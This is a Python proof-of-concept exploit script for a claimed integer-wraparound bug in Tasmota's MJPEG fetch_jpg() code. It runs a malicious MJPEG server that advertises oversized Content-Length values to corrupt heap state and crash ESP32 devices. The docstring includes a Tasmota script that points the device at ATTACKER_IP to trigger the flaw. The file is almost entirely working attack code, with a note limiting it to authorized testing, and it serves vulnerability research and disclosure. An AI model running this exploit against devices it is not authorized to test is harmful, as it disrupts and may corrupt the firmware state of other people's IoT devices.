#!/usr/bin/env python3
r"""
PoC: CVE-2026-38427
Target: Tasmota <= 15.3.0.3
File: tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino
Function: fetch_jpg() case 2

Vulnerability:
    Content-Length from MJPEG frame stored in uint16_t:

        char inbuff[64];
        stream.readBytesUntil('\n', inbuff, sizeof(inbuff));
        // "Content-Length: 70000"
        char *cp = strchr(inbuff, ':');
        uint16_t size = 0;
        if (cp) {
            size = atoi(cp + 1);  // atoi("70000") = 70000 (int)
            // IMPLICIT TRUNCATION: uint16_t size = 70000 → 4464 (70000 % 65536)
        }
        uint8_t *buff = (uint8_t *)special_malloc(size);  // malloc(4464)
        if (buff) {
            stream.readBytes(buff, size);  // reads 4464 bytes
        }
        // Stream still has 65536 unread bytes → heap/stream corruption

Integer Wraparound:
    value   → uint16_t result
    65536   → 0     (if(size>0) skipped entirely)
    65537   → 1     (malloc 1 byte)
    70000   → 4464  (malloc 4464, but JPEG is 70000 bytes)
    131072  → 0     (malloc 0 / skipped)

Impact:
    - Heap corruption via stream state mismatch
    - malloc(0) or malloc(1) with large data pending → crash
    - On ESP32: special_malloc(0) may return non-NULL → heap corruption

Tasmota script to trigger:
    >D
    >B
    fetchjp(ATTACKER_IP:8889/stream,0,0,1)
    >1
    =fetchjp(2,0,0,1) ; get next frame (triggers case 2)

Usage:
    python3 CVE-2026-38427_poc.py --port 8889 --cl 65537
    python3 CVE-2026-38427_poc.py --port 8889 --cl 131072

Intended for testing devices you own or are authorized to assess.

Author: Saidakbarxon Maxsudxonov
CVE: CVE-2026-38427
"""

import socket
import argparse
import time
import os
from datetime import datetime

# Inner width of the banner box; matches the 54-character rules printed by main().
_BANNER_WIDTH = 54
_BANNER_TEXT = (
    "CVE-2026-38427 PoC — Tasmota fetch_jpg()",
    "uint16_t Integer Wraparound → Heap Overflow",
    "Affected: Tasmota <= 15.3.0.3 (ESP32)",
)
# Built from the width so the right-hand border always lines up.
BANNER = "\n".join(
    ["", "╔" + "═" * _BANNER_WIDTH + "╗"]
    + [f"║  {text:<{_BANNER_WIDTH - 2}}║" for text in _BANNER_TEXT]
    + ["╚" + "═" * _BANNER_WIDTH + "╝", ""]
)

# Fake minimal JPEG prefix (20 bytes) and end-of-image marker.
_JPEG_HEADER = (
    b"\xff\xd8\xff\xe0"        # SOI + APP0 marker
    b"\x00\x10JFIF\x00"        # JFIF header
    b"\x01\x01\x00\x00\x01"
    b"\x00\x01\x00\x00"
)
_JPEG_EOI = b"\xff\xd9"        # EOI marker


def log(msg: str, level: str = "*") -> None:
    """Print *msg* prefixed with the current time and a one-character level tag."""
    ts = datetime.now().strftime("%H:%M:%S")
    print(f"[{ts}] [{level}] {msg}")


def uint16_wrap(value: int) -> int:
    """Simulate uint16_t truncation (keep only the low 16 bits of *value*)."""
    return value & 0xFFFF


def make_mjpeg_frame(content_length_header, actual_data_size, fill_byte=b'\xff'):
    """Build a single MJPEG multipart frame.

    Args:
        content_length_header: Value written into the ``Content-Length``
            header of the part.
        actual_data_size: Number of JPEG payload bytes actually emitted.
            Negative values are treated as 0.
        fill_byte: Single byte used to pad the payload between the JPEG
            header and the EOI marker.

    Returns:
        The encoded part: boundary line, part headers, a blank line, the
        payload, and a trailing CRLF.

    Note:
        The payload is exactly ``actual_data_size`` bytes and ends with the
        EOI marker whenever the size is large enough to hold the 20-byte
        header plus the 2-byte EOI; smaller sizes yield a truncated header.
    """
    size = max(actual_data_size, 0)
    # Reserve room for BOTH the header and the EOI marker. Reserving only the
    # header makes the payload two bytes too long, and the final slice then
    # cuts the EOI marker off.
    pad_len = max(size - len(_JPEG_HEADER) - len(_JPEG_EOI), 0)
    jpeg_data = (_JPEG_HEADER + fill_byte * pad_len + _JPEG_EOI)[:size]

    part_header = (
        f"--myboundary\r\n"
        f"Content-Type: image/jpeg\r\n"
        f"Content-Length: {content_length_header}\r\n"
        f"\r\n"
    ).encode()
    return part_header + jpeg_data + b"\r\n"


def handle_client(conn, addr, content_length, frames):
    """Serve one connected client: send the multipart preamble, then frames.

    Args:
        conn: Connected socket returned by ``accept()``; closed on return.
        addr: Peer ``(host, port)`` tuple, used only for logging.
        content_length: Content-Length value advertised for every frame; the
            same number of payload bytes is sent.
        frames: Number of frames to send.
    """
    log(f"Tasmota connected: {addr[0]}:{addr[1]}", "+")
    actual_cl = uint16_wrap(content_length)
    leftover = content_length - actual_cl

    with conn:
        try:
            # Receive initial HTTP request
            request = conn.recv(2048).decode('utf-8', errors='ignore')
            log(f"Request: {request.splitlines()[0] if request else 'empty'}")

            # Step 1: Send initial HTTP 200 response (fetch_jpg case 0)
            log(f"Content-Length in header: {content_length}")
            log(f"uint16_t truncated value: {actual_cl} ({content_length} & 0xFFFF)")
            log(f"Buffer allocated on ESP32: {actual_cl} bytes")
            log(f"Actual data in stream: {content_length} bytes")
            log(f"Unread bytes after readBytes(): {leftover}", "!")

            init_response = (
                "HTTP/1.1 200 OK\r\n"
                "Content-Type: multipart/x-mixed-replace; boundary=myboundary\r\n"
                "Connection: keep-alive\r\n"
                "\r\n"
            ).encode()
            # sendall() keeps writing until the whole buffer is queued;
            # send() may stop after a partial write.
            conn.sendall(init_response)
            log("Initial HTTP response sent (case 0 complete)")
            time.sleep(0.5)

            # Step 2: Send MJPEG frames (case 2). Every frame is identical,
            # so build it once instead of once per iteration.
            frame = make_mjpeg_frame(
                content_length_header=content_length,
                actual_data_size=content_length,
            )
            for number in range(1, frames + 1):
                log(f"Sending frame {number}/{frames} with Content-Length: {content_length}", "!")
                conn.sendall(frame)
                log(f" Header says: {content_length} bytes")
                log(f" ESP32 reads: {actual_cl} bytes (uint16_t wrap)")
                log(f" Remaining in stream: {leftover} bytes (CORRUPTION!)", "!")
                time.sleep(0.3)

            log("All frames sent — ESP32 should crash/reboot now", "!")
            time.sleep(2)
        except (BrokenPipeError, ConnectionResetError):
            # The peer went away mid-transfer, either as a broken pipe or as
            # a connection reset.
            log("ESP32 disconnected (likely crashed!)", "+")
        except OSError as e:
            log(f"Error: {e}", "-")


def main():
    """Parse command-line options and serve clients one at a time until Ctrl-C."""
    print(BANNER)
    parser = argparse.ArgumentParser(description="CVE-2026-38427 PoC Server")
    parser.add_argument("--ip", default="0.0.0.0")
    parser.add_argument("--port", type=int, default=8889)
    parser.add_argument("--cl", type=int, default=65537,
                        help="Malicious Content-Length (>65535)")
    parser.add_argument("--frames", type=int, default=3,
                        help="Number of frames to send")
    args = parser.parse_args()

    if args.cl <= 65535:
        log(f"WARNING: Content-Length {args.cl} <= 65535, no wraparound!", "-")
        log("Use --cl 65537 or higher for wraparound", "-")

    rule = "─" * 54
    log("CVE-2026-38427 — uint16_t Integer Wraparound PoC", "+")
    log(f"Listening: {args.ip}:{args.port}")
    log(f"Content-Length: {args.cl} → wraps to {uint16_wrap(args.cl)}")
    log(rule)
    log("Wraparound table:")
    for cl in (65536, 65537, 65600, 70000, 131072, 131073):
        wrapped = uint16_wrap(cl)
        log(f" {cl:>7} → {wrapped:>5} (corrupts {cl-wrapped} bytes in stream)")
    log(rule)
    log("Tasmota script:")
    log(" >D")
    log(" >B")
    log(f" fetchjp(YOUR_IP:{args.port}/stream,0,0,1)")
    log(" >1")
    log(" =fetchjp(2,0,0,1)")
    log(rule)

    # The context manager closes the listening socket on every exit path.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server.bind((args.ip, args.port))
        server.listen(5)
        log("Waiting for Tasmota device...", "*")
        try:
            while True:
                conn, addr = server.accept()
                handle_client(conn, addr, args.cl, args.frames)
        except KeyboardInterrupt:
            log("Stopped")


if __name__ == "__main__":
    main()